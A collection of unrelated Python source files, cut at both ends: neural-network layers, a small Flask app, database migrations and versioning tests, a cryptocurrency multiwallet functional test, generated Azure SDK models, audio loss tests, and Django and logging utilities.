initial_state = tf.split(state_in, 2, axis=-1)
feature, c_out, h_out = rnn(
feature, initial_state=initial_state)
state_out = tf.concat([c_out, h_out], axis=-1)
return feature, cnn_feature, image_feature, state_out
def a_net(self, feature, scope):
'''
description: actor network
param {feature: the output of feature_net}
return {Tensor: the act_logits tensor}
'''
net = feature
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
net = tf.layers.dense(net, get_shape(
feature)[-1], activation=tf.nn.relu, name='dense')
act_logits = tf.layers.dense(
net, self.act_space, activation=None, name='a_logits')
return act_logits
def v_net(self, feature, scope):
'''
description: value network as critic
param {feature: the output of feature_net}
return {Tensor: the v_value tensor}
'''
net = feature
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
net = tf.layers.dense(
net,
get_shape(feature)[-1],
activation=tf.nn.relu,
name='dense'
)
v_value = tf.squeeze(
tf.layers.dense(
net,
1,
activation=None,
name='v_value'
),
axis=-1
)
return v_value
def reconstruct_net(self):
# TODO
pass
def control_net(self):
# TODO
pass
@staticmethod
def residual_block(input, scope):
shape = get_shape(input)
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
last_output = tf.nn.relu(input)
last_output = tf.layers.conv2d(
last_output,
filters=shape[-1],
kernel_size=3,
strides=1,
padding='same',
activation=None,
name='conv0'
)
last_output = tf.nn.relu(last_output)
last_output = tf.layers.conv2d(
last_output,
filters=shape[-1],
kernel_size=3,
strides=1,
padding='same',
activation=None,
name='conv1'
)
output = last_output + input
return output
return Model
|
from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def main():
return """<html>
<head>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.11.1.min.js"></script>
<script>
$(document).ready(function(){
$('#btnSend').click(function(){
$.ajax({
type: 'POST',
url: '/process',
success: function(data){
alert(data);
}
});
});
});
</script>
</head>
<body>
Skillset: <input type="text" name="skillset"><br>
<input type="button" id="btnSend" value="process">
</body>
</html>"""
@app.route('/process', methods=['POST'])
def view_do_something():
if request.method == 'POST':
#your database process here
return "OK"
else:
return "NO OK"
if __name__ == '__main__':
app.run()
|
"""Add Build.family_id
Revision ID: cb99fdfb903
Revises: 1109e724859f
Create Date: 2013-12-23 11:32:17.060863
"""
# revision identifiers, used by Alembic.
revision = 'cb99fdfb903'
down_revision = '1109e724859f'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('build', sa.Column('family_id', sa.GUID(), nullable=True))
op.create_index('idx_build_family_id', 'build', ['family_id'])
def downgrade():
op.drop_index('idx_build_family_id', 'build')
op.drop_column('build', 'family_id')
|
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
from setuptools import find_packages, setup
MAIN_REQUIREMENTS = ["airbyte-cdk~=0.1.12", "requests_oauthlib~=1.3.0", "pytz~=2021.1", "pendulum~=1.5.1"]
TEST_REQUIREMENTS = [
"pytest~=6.1",
"pytest-mock~=3.6.1",
"jsonschema~=3.2.0",
"responses~=0.13.3",
"freezegun~=1.1.0",
]
setup(
name="source_amazon_ads",
description="Source implementation for Amazon Ads.",
author="Airbyte",
author_email="contact@airbyte.io",
packages=find_packages(),
install_requires=MAIN_REQUIREMENTS,
package_data={"": ["*.json", "schemas/*.json", "schemas/shared/*.json"]},
extras_require={
"tests": TEST_REQUIREMENTS,
},
)
|
"""
ASGI config for suorganizer project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'suorganizer.settings')
application = get_asgi_application()
|
from sqlalchemy.ext.declarative import declarative_base
from history_meta import VersionedMeta, VersionedListener
from sqlalchemy import create_engine, Column, Integer, String, ForeignKey
from sqlalchemy.orm import clear_mappers, compile_mappers, sessionmaker, deferred
from sqlalchemy.test.testing import TestBase, eq_
from sqlalchemy.test.entities import ComparableEntity
def setup():
global engine
engine = create_engine('sqlite://', echo=True)
class TestVersioning(TestBase):
def setup(self):
global Base, Session
Base = declarative_base(metaclass=VersionedMeta, bind=engine)
Session = sessionmaker(extension=VersionedListener())
def teardown(self):
clear_mappers()
Base.metadata.drop_all()
def create_tables(self):
Base.metadata.create_all()
def test_plain(self):
class SomeClass(Base, ComparableEntity):
__tablename__ = 'sometable'
id = Column(Integer, primary_key=True)
name = Column(String(50))
self.create_tables()
sess = Session()
sc = SomeClass(name='sc1')
sess.add(sc)
sess.commit()
sc.name = 'sc1modified'
sess.commit()
assert sc.version == 2
SomeClassHistory = SomeClass.__history_mapper__.class_
eq_(
sess.query(SomeClassHistory).filter(SomeClassHistory.version == 1).all(),
[SomeClassHistory(version=1, name='sc1')]
)
sc.name = 'sc1modified2'
eq_(
sess.query(SomeClassHistory).order_by(SomeClassHistory.version).all(),
[
SomeClassHistory(version=1, name='sc1'),
SomeClassHistory(version=2, name='sc1modified')
]
)
assert sc.version == 3
sess.commit()
sc.name = 'temp'
sc.name = 'sc1modified2'
sess.commit()
eq_(
sess.query(SomeClassHistory).order_by(SomeClassHistory.version).all(),
[
SomeClassHistory(version=1, name='sc1'),
SomeClassHistory(version=2, name='sc1modified')
]
)
sess.delete(sc)
sess.commit()
eq_(
sess.query(SomeClassHistory).order_by(SomeClassHistory.version).all(),
[
SomeClassHistory(version=1, name='sc1'),
SomeClassHistory(version=2, name='sc1modified'),
SomeClassHistory(version=3, name='sc1modified2')
]
)
def test_from_null(self):
class SomeClass(Base, ComparableEntity):
__tablename__ = 'sometable'
id = Column(Integer, primary_key=True)
name = Column(String(50))
self.create_tables()
sess = Session()
sc = SomeClass()
sess.add(sc)
sess.commit()
sc.name = 'sc1'
sess.commit()
assert sc.version == 2
def test_deferred(self):
"""test versioning of unloaded, deferred columns."""
class SomeClass(Base, ComparableEntity):
__tablename__ = 'sometable'
id = Column(Integer, primary_key=True)
name = Column(String(50))
data = deferred(Column(String(25)))
self.create_tables()
sess = Session()
sc = SomeClass(name='sc1', data='somedata')
sess.add(sc)
sess.commit()
sess.close()
sc = sess.query(SomeClass).first()
assert 'data' not in sc.__dict__
sc.name = 'sc1modified'
sess.commit()
assert sc.version == 2
SomeClassHistory = SomeClass.__history_mapper__.class_
eq_(
sess.query(SomeClassHistory).filter(SomeClassHistory.version == 1).all(),
[SomeClassHistory(version=1, name='sc1', data='somedata')]
)
def test_joined_inheritance(self):
class BaseClass(Base, ComparableEntity):
__tablename__ = 'basetable'
id = Column(Integer, primary_key=True)
name = Column(String(50))
type = Column(String(20))
__mapper_args__ = {'polymorphic_on':type, 'polymorphic_identity':'base'}
class SubClassSeparatePk(BaseClass):
__tablename__ = 'subtable1'
id = Column(Integer, primary_key=True)
base_id = Column(Integer, ForeignKey('basetable.id'))
subdata1 = Column(String(50))
__mapper_args__ = {'polymorphic_identity':'sep'}
class SubClassSamePk(BaseClass):
__tablename__ = 'subtable2'
id = Column(Integer, ForeignKey('basetable.id'), primary_key=True)
subdata2 = Column(String(50))
__mapper_args__ = {'polymorphic_identity':'same'}
self.create_tables()
sess = Session()
sep1 = SubClassSeparatePk(name='sep1', subdata1='sep1subdata')
base1 = BaseClass(name='base1')
same1 = SubClassSamePk(name='same1', subdata2='same1subdata')
sess.add_all([sep1, base1, same1])
sess.commit()
base1.name = 'base1mod'
same1.subdata2 = 'same1subdatamod'
sep1.name ='sep1mod'
sess.commit()
BaseClassHistory = BaseClass.__history_mapper__.class_
SubClassSeparatePkHistory = SubClassSeparatePk.__history_mapper__.class_
SubClassSamePkHistory = SubClassSamePk.__history_mapper__.class_
eq_(
sess.query(BaseClassHistory).order_by(BaseClassHistory.id).all(),
[
SubClassSeparatePkHistory(id=1, name=u'sep1', type=u'sep', version=1),
BaseClassHistory(id=2, name=u'base1', type=u'base', version=1),
SubClassSamePkHistory(id=3, name=u'same1', type=u'same', version=1)
]
)
same1.subdata2 = 'same1subdatamod2'
eq_(
sess.query(BaseClassHistory).order_by(BaseClassHistory.id, BaseClassHistory.version).all(),
[
SubClassSeparatePkHistory(id=1, name=u'sep1', type=u'sep', version=1),
BaseClassHistory(id=2, name=u'base1', type=u'base', version=1),
SubClassSamePkHistory(id=3, name=u'same1', type=u'same', version=1),
SubClassSamePkHistory(id=3, name=u'same1', type=u'same', version=2)
]
)
base1.name = 'base1mod2'
eq_(
sess.query(BaseClassHistory).order_by(BaseClassHistory.id, BaseClassHistory.version).all(),
[
SubClassSeparatePkHistory(id=1, name=u'sep1', type=u'sep', version=1),
BaseClassHistory(id=2, name=u'base1', type=u'base', version=1),
BaseClassHistory(id=2, name=u'base1mod', type=u'base', version=2),
SubClassSamePkHistory(id=3, name=u'same1', type=u'same', version=1),
SubClassSamePkHistory(id=3, name=u'same1', type=u'same', version=2)
]
)
def test_single_inheritance(self):
class BaseClass(Base, ComparableEntity):
__tablename__ = 'basetable'
id = Column(Integer, primary_key=True)
name = Column(String(50))
type = Column(String(50))
__mapper_args__ = {'polymorphic_on':type, 'polymorphic_identity':'base'}
class SubClass(BaseClass):
subname = Column(String(50))
__mapper_args__ = {'polymorphic_identity':'sub'}
self.create_tables()
sess = Session()
b1 = BaseClass(name='b1')
sc = SubClass(name='s1', subname='sc1')
sess.add_all([b1, sc])
sess.commit()
b1.name='b1modified'
BaseClassHistory = BaseClass.__history_mapper__.class_
SubClassHistory = SubClass.__history_mapper__.class_
eq_(
sess.query(BaseClassHistory).order_by(BaseClassHistory.id, BaseClassHistory.version).all(),
[BaseClassHistory(id=1, name=u'b1', type=u'base', version=1)]
)
sc.name ='s1modified'
b1.name='b1modified2'
eq_(
sess.query(BaseClassHistory).order_by(BaseClassHistory.id, BaseClassHistory.version).all(),
[
BaseClassHistory(id=1, name=u'b1', type=u'base', version=1),
BaseClassHistory(id=1, name=u'b1modified', type=u'base', version=2),
SubClassHistory(id=2, name=u's1', type=u'sub', version=1)
]
)
def test_unique(self):
class SomeClass(Base, ComparableEntity):
__tablename__ = 'sometable'
id = Column(Integer, primary_key=True)
name = Column(String(50), unique=True)
data = Column(String(50))
self.create_tables()
sess = Session()
sc = SomeClass(name='sc1', data='sc1')
sess.add(sc)
sess.commit()
sc.data = 'sc1modified'
sess.commit()
assert sc.version == 2
sc.data = 'sc1modified2'
sess.commit()
assert sc.version == 3
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Machinecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a machinecoind node can load multiple wallet files
"""
import os
import shutil
import time
from test_framework.test_framework import MachinecoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class MultiWalletTest(MachinecoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.supports_cli = True
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, 'regtest', *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir('wallet.dat')), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
os.rename(wallet_dir("wallet.dat"), wallet_dir("w8"))
# create another dummy wallet for use in testing backups later
self.start_node(0, [])
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_dir("wallet.dat"), empty_wallet)
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly
# '' - to verify default wallet file is created correctly
wallet_names = ['w1', 'w2', 'w3', 'w', 'sub/w5', os.path.join(self.options.tmpdir, 'extern/w6'), 'w7_symlink', 'w8', '']
extra_args = ['-wallet={}'.format(n) for n in wallet_names]
self.start_node(0, extra_args)
assert_equal(set(node.listwallets()), set(wallet_names))
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
# should not initialize if wallet path can't be created
exp_stderr = "boost::filesystem::create_directory: (The system cannot find the path specified|Not a directory):"
self.nodes[0].assert_start_raises_init_error(['-wallet=wallet.dat/bad'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
# should not initialize if there are duplicate wallets
self.nodes[0].assert_start_raises_init_error(['-wallet=w1', '-wallet=w1'], 'Error: Error loading wallet w1. Duplicate -wallet filename specified.')
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
exp_stderr = "BerkeleyBatch: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], 'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -zapwallettxes with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-zapwallettxes', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
self.nodes[0].assert_start_raises_init_error(['-zapwallettxes=1', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
self.nodes[0].assert_start_raises_init_error(['-zapwallettxes=2', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
self.log.info("Do not allow -salvagewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-salvagewallet', '-wallet=w1', '-wallet=w2'], "Error: -salvagewallet is only allowed with a single wallet file")
self.nodes[0].assert_start_raises_init_error(['-salvagewallet=1', '-wallet=w1', '-wallet=w2'], "Error: -salvagewallet is only allowed with a single wallet file")
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet', '-wallet=w1', '-wallet=w2'], "Error: -upgradewallet is only allowed with a single wallet file")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet=1', '-wallet=w1', '-wallet=w2'], "Error: -upgradewallet is only allowed with a single wallet file")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0, ['-wallet=w4', '-wallet=w5'])
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5.generate(1)
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-wallet=w4', '-wallet=w5', '-walletdir=' + data_dir()])
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-walletdir=' + competing_wallet_dir])
exp_stderr = "Error: Error initializing wallet database environment \"\S+competing_walletdir\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0, extra_args)
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
wallets[0].generate(1)
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
w1.generate(101)
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
w1.generate(1)
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], "regtest")
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(4.0)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 4.0)
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-32601, "Method not found", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
assert_raises_rpc_error(-18, 'Wallet wallets not found.', self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
assert_raises_rpc_error(-4, 'Wallet file verification failed: Error loading wallet w1. Duplicate -wallet filename specified.', self.nodes[0].loadwallet, wallet_names[0])
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-1, "BerkeleyBatch: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed: Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
assert_raises_rpc_error(-18, "Directory empty_wallet_dir does not contain a wallet.dat file", self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
assert_raises_rpc_error(-4, "Wallet w2 already exists.", self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "Cannot unload the requested wallet", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
wallets = node.listwallets()
w2.encryptwallet('test')
self.restart_node(0, ['-wallet={}'.format(wallet) for wallet in wallets])
w1 = node.get_wallet_rpc(wallet_names[0])
w2 = node.get_wallet_rpc(wallet_names[1])
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-32601, "Method not found (wallet method is disabled because no wallet is loaded)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
if __name__ == '__main__':
MultiWalletTest().main()
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TaskReactivateOptions(Model):
"""Additional parameters for reactivate operation.
:param timeout: The maximum time that the server can spend processing the
request, in seconds. The default is 30 seconds. Default value: 30 .
:type timeout: int
:param client_request_id: The caller-generated request identity, in the
form of a GUID with no decoration such as curly braces, e.g.
9C4D50EE-2D56-4CD3-8152-34347DC9F2B0.
:type client_request_id: str
:param return_client_request_id: Whether the server should return the
client-request-id in the response. Default value: False .
:type return_client_request_id: bool
:param ocp_date: The time the request was issued. Client libraries
typically set this to the current system clock time; set it explicitly if
you are calling the REST API directly.
:type ocp_date: datetime
:param if_match: An ETag value associated with the version of the resource
known to the client. The operation will be performed only if the
resource's current ETag on the service exactly matches the value specified
by the client.
:type if_match: str
:param if_none_match: An ETag value associated with the version of the
resource known to the client. The operation will be performed only if the
resource's current ETag on the service does not match the value specified
by the client.
:type if_none_match: str
:param if_modified_since: A timestamp indicating the last modified time of
the resource known to the client. The operation will be performed only if
the resource on the service has been modified since the specified time.
:type if_modified_since: datetime
:param if_unmodified_since: A timestamp indicating the last modified time
of the resource known to the client. The operation will be performed only
if the resource on the service has not been modified since the specified
time.
:type if_unmodified_since: datetime
"""
def __init__(self, timeout=30, client_request_id=None, return_client_request_id=False, ocp_date=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None):
super(TaskReactivateOptions, self).__init__()
self.timeout = timeout
self.client_request_id = client_request_id
self.return_client_request_id = return_client_request_id
self.ocp_date = ocp_date
self.if_match = if_match
self.if_none_match = if_none_match
self.if_modified_since = if_modified_since
self.if_unmodified_since = if_unmodified_since
|
# Copyright 2021 The DDSP Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for ddsp.losses."""
from ddsp import core
from ddsp import losses
import numpy as np
import tensorflow as tf
class LossGroupTest(tf.test.TestCase):
def setUp(self):
"""Create some dummy input data for the chain."""
super().setUp()
# Create a network output dictionary.
self.nn_outputs = {
'audio': tf.ones((3, 8000), dtype=tf.float32),
'audio_synth': tf.ones((3, 8000), dtype=tf.float32),
'magnitudes': tf.ones((3, 200, 2), dtype=tf.float32),
'f0_hz': 200 + tf.ones((3, 200, 1), dtype=tf.float32),
}
# Create Processors.
spectral_loss = losses.SpectralLoss()
crepe_loss = losses.PretrainedCREPEEmbeddingLoss(name='crepe_loss')
# Create DAG for testing.
self.dag = [
(spectral_loss, ['audio', 'audio_synth']),
(crepe_loss, ['audio', 'audio_synth']),
]
self.expected_outputs = [
'spectral_loss',
'crepe_loss'
]
def _check_tensor_outputs(self, strings_to_check, outputs):
for tensor_string in strings_to_check:
tensor = core.nested_lookup(tensor_string, outputs)
self.assertIsInstance(tensor, (np.ndarray, tf.Tensor))
def test_dag_construction(self):
"""Tests if DAG is built properly and runs.
"""
loss_group = losses.LossGroup(dag=self.dag)
print('!!!!!!!!!!!', loss_group.dag, loss_group.loss_names, self.dag)
loss_outputs = loss_group(self.nn_outputs)
self.assertIsInstance(loss_outputs, dict)
self._check_tensor_outputs(self.expected_outputs, loss_outputs)
class SpectralLossTest(tf.test.TestCase):
def test_output_shape_is_correct(self):
"""Test correct shape with all losses active."""
loss_obj = losses.SpectralLoss(
mag_weight=1.0,
delta_time_weight=1.0,
delta_freq_weight=1.0,
cumsum_freq_weight=1.0,
logmag_weight=1.0,
loudness_weight=1.0,
)
input_audio = tf.ones((3, 8000), dtype=tf.float32)
target_audio = tf.ones((3, 8000), dtype=tf.float32)
loss = loss_obj(input_audio, target_audio)
self.assertListEqual([], loss.shape.as_list())
self.assertTrue(np.isfinite(loss))
class PretrainedCREPEEmbeddingLossTest(tf.test.TestCase):
def test_output_shape_is_correct(self):
loss_obj = losses.PretrainedCREPEEmbeddingLoss()
input_audio = tf.ones((3, 16000), dtype=tf.float32)
target_audio = tf.ones((3, 16000), dtype=tf.float32)
loss = loss_obj(input_audio, target_audio)
self.assertListEqual([], loss.shape.as_list())
self.assertTrue(np.isfinite(loss))
if __name__ == '__main__':
tf.test.main()
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2018 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import os
from django.apps import AppConfig as BaseAppConfig
def run_setup_hooks(*args, **kwargs):
from django.conf import settings
from .celeryapp import app as celeryapp
LOCAL_ROOT = os.path.abspath(os.path.dirname(__file__))
settings.TEMPLATES[0]["DIRS"].insert(0, os.path.join(LOCAL_ROOT, "templates"))
if celeryapp not in settings.INSTALLED_APPS:
settings.INSTALLED_APPS += (celeryapp, )
class AppConfig(BaseAppConfig):
name = "nexus"
label = "nexus"
def ready(self):
super(AppConfig, self).ready()
run_setup_hooks()
|
from time import time
class Timer:
"""
Simple class for checking time
"""
def __init__(self):
self.start_time: float = -1
self.end_time: float = -1
self.duration: float = -1
def start(self):
self.start_time = time()
def stop(self):
self.end_time = time()
self.duration = self.end_time - self.start_time
def reset(self):
self.start_time = -1
self.end_time = -1
self.duration = -1
|
# Copyright 2008-2009 ITA Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Twisted logging with log levels"""
import os
import sys
import time
from twisted.python import log, logfile, failure, util
# Log levels:
LEVELS = (
"ERROR", # 0
"WARN", # 1
"INFO", # 2
